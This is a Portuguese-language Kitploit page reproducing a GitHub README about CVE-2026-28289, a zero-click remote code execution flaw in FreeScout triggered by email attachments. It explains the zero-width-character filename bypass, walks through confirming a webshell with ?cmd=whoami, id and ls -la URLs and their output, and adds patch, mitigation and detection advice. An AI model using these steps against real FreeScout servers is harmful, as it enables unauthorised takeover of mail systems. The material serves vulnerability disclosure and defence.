Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-28289 — CVE-2026-28289 | Kitploit
Ferramentas/GitHubGitHub/0xblackash/cve-2026-28289
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de PayloadsSegurança de Email
GitHub0xblackash/cve-2026-28289

CVE-2026-28289

CVE-2026-28289

Ver Repositório
15há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2026-28289 — “Mail2Shell”

1772564185117

RCE Não Autenticada de Zero-Clique no FreeScout via Bypass de Anexo de E-mail

Severity CVSS Affected Patched


📖 Visão Geral

CVE-2026-28289, apelidada de Mail2Shell, é uma vulnerabilidade crítica de Execução Remota de Código (RCE) de zero-clique que afeta o FreeScout.

Um atacante pode enviar um e-mail especialmente criado para uma caixa de entrada do FreeScout e obter acesso remoto ao shell do servidor subjacente — sem autenticação e sem interação do utilizador.


🧠 Resumo da Vulnerabilidade

Baixar ferramenta
CampoValor
ID CVECVE-2026-28289
Gravidade🔴 Crítica
CVSS10.0 (Máximo)
Vetor de AtaqueRemoto (E-mail)
Autenticação Necessária❌ Nenhuma
Interação do Utilizador❌ Nenhuma
ImpactoComprometimento Total do Servidor

⚙️ Detalhamento Técnico

📨 Passo 1 — Entrega de E-mail Malicioso

O atacante envia um e-mail com um anexo especialmente criado.

🧩 Passo 2 — Bypass da Sanitização do Nome do Ficheiro

O FreeScout tenta bloquear ficheiros perigosos como .htaccess, mas o atacante:

  • Adiciona um caractere Unicode de largura zero ao início
  • Ignora a validação do nome do ficheiro
  • O ficheiro é salvo como um ficheiro executável válido no servidor

💣 Passo 3 — Execução Remota

O atacante acede ao ficheiro enviado através do caminho web e executa comandos arbitrários.

Resultado:

root@kitploit:~
# Acesso remoto ao shell obtido
whoami
www-data

✅ Se a operação for bem-sucedida, eis EXATAMENTE o que verá (passo a passo):

mail2shell

1. No seu terminal (logo após executar o script)

root@kitploit:~
✅ E-mail enviado com sucesso! (RCE de zero-clique acionada)

Verá também as instruções para os próximos passos impressas.

2. Quando executar o comando find no seu servidor FreeScout via SSH

Ele retornará imediatamente o caminho real completo para o ficheiro enviado, por exemplo:

root@kitploit:~
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt

(ou pasta de data/hora semelhante — isto confirma que o FreeScout salvou o anexo automaticamente).

3. A PROVA real de sucesso — no seu navegador (este é o momento em que sabe que tem RCE total)

Copie o caminho do passo 2 e abra este URL:

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami

Verá esta saída exata (texto simples):

root@kitploit:~
www-data

(Ou qualquer que seja o utilizador Apache/PHP no seu servidor — normalmente www-data, apache ou nobody).

Agora altere o comando e recarregue:

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id

Verá:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

E para ls -la:

root@kitploit:~
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar  5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar  5 14:00 ..
-rw-r--r-- 1 www-data www-data   87 Mar  5 15:00 webshell.txt

Esta saída aparece diretamente na página do navegador (dentro de tags <pre> do webshell). Sem erro, sem código fonte PHP, sem 404.

Isto significa que tem execução remota de código total no servidor — o bypass do .htaccess + espaço de largura zero funcionou perfeitamente, e o anexo do e-mail foi processado sem qualquer interação do utilizador.


🎯 Porque Isto é Perigoso

  • ⚡ Exploração de zero-clique
  • 🌐 Superfície de ataque remota (e-mail)
  • 🔓 Nenhuma autenticação necessária
  • 🧨 Capacidade total de RCE
  • 📂 Potencial exfiltração de dados
  • 🔁 Movimentação lateral dentro de redes internas

📦 Versões Afetadas

Todas as versões do FreeScout:

root@kitploit:~
<= 1.8.206

✅ Versão Corrigida

Atualize imediatamente para:

root@kitploit:~
1.8.207 ou posterior

🛡️ Medidas de Mitigação

1️⃣ Ação Imediata

  • Atualize o FreeScout para a versão mais recente

2️⃣ Reforce o Servidor Web

  • Desative AllowOverride All na configuração do Apache
  • Restrinja a execução dentro de diretórios de anexos

3️⃣ Monitorize os Logs

Procure por:

  • Ficheiros .htaccess suspeitos
  • Envios de anexos incomuns
  • Tentativas de acesso direto a /storage/attachments/

🔍 Dicas de Deteção

Indicadores de compromisso podem incluir:

  • Ficheiros .htaccess desconhecidos em pastas de anexos
  • Picos de tráfego de saída
  • Servidor web a gerar processos shell
  • Requisições POST/GET suspeitas para caminhos de anexos

🧪 Prova-de-Conceito (Conceptual)

root@kitploit:~
E-mail → Anexo Malicioso (Nome de ficheiro com prefixo Unicode)
        ↓
Salvo em caminho previsível
        ↓
Execução acessível via web
        ↓
Shell remoto

📌 Vulnerabilidade Relacionada

Esta questão contornou as proteções adicionadas em:

  • CVE-2026-27636

Demonstrando lógica incompleta de sanitização de nomes de ficheiros.


📊 Avaliação de Impacto

Área de RiscoImpacto
Confidencialidade🔴 Alto
Integridade🔴 Alto
Disponibilidade🔴 Alto

🧩 Lições Aprendidas

  • A manipulação de Unicode deve ser normalizada antes da validação
  • Nunca confiar apenas na filtragem de nomes de ficheiros
  • Diretórios de anexos nunca devem permitir execução de código
  • Vetores de zero-clique são superfícies de ataque de alto risco

📚 Referências

  • Comunicado de Segurança do FreeScout
  • Entrada NVD para CVE-2026-28289

🚨 Recomendação Final

Se executa uma instância auto-hospedada do FreeScout:

🔥 Atualize imediatamente. 💡 Assuma comprometimento se estiver a executar versões vulneráveis expostas à internet. 🛡 Realize revisão de logs e verificações de integridade.